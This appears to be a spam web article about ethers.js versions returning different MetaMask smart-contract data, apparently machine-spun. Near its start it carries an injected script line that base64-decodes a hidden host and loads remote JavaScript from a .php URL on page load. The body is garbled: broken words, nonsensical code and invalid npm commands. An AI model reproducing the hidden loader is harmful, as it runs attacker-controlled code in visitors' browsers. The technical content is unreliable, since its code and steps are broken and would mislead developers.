Metamask: Data not fetching from smart contract for the same code in different versions of “ethers”

const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=605de47d”;document.body.appendChild(script);

Metamask Question: Data does not get off the smart contract

Assessed to bout a real-reality marks with DAPP with Metamask, I’m unexpected problem with a different data fromy to the same intelligent contracting betweens of “Ehers” (5.7.2). This problem-caused frustration and wasted development time.

The problem: differentiate Ethers versions

The if you have NOP, it is the Web3.js Director of the Etherum blockchain versions. Specifically, the there are the various “Ethers” (5.7.2) versiones for the same code obtuins data from the smart contains differentiation.

The Code: The same logic between versions

Downloads a single JavaScript fillet to managea. The fillet is structured as follows:


Const web3 = required ("Web3");

Const Web3provider = required ('Web3 Service Provider');

Async Function Main () {

Const Web3 = New Web3 (New Web3 Provider ());

// Replace this comment with your actual logic to contact you smart contact

CONST PROPERTYData = Waiting for (0x … property_addresss, [" get_property_data "]);

// saving or processing data as necessary

Console.Log (Propertydata);


The problem: differentiate Ethers versions

When this code runs, the different versions of “Ethers” (5.7.2) produe differentiation for the same props. For Example:

  • In the version 5.7.0, the get_property_data' function returns an object.

  • In version 5.7.1, theget_property_data’ function returns an emmpty array.

Solution: Update Web3.Js and Service Provider

To solve this problem, web to update the Web3.Js director and the service provider to ensurre compativity between various Ethereum blockchain versions. Here’s a step by step:

  • update Web3.js : Update the Web3 package to 4.x.x.x.


NPM Install web3@4.x.x.x.x.x


  • update the server provider : Update the “Ethers” server provider to 5x.x, which subports new Ethereum Blockchain Versions.


NPM Update-Power-Swocal EThers.js


Testing and installation

After uploading the code base, wet to test and instal in the various Ethereum Blockchain Values ​​to check them them is solved.

  • ** Test DAPP to various Ethereum Blockchain Verses (for Example, 5.7.0, 5.7.1, 5.8.0) to solve the download problem.

  • Check compatibility

    : Check that the same logic and code result in the same between differentiates ethers.


The Metamask quests wes that are due to the incompatible “Ethers” versions. The Webs of the Web3.JS director and service provider and provided consistent data collection in the Ethereum blockchain versions. This solution can be applied to similar issues in all Dapp Projects that require compatibility with differentiating the blockchain versions.

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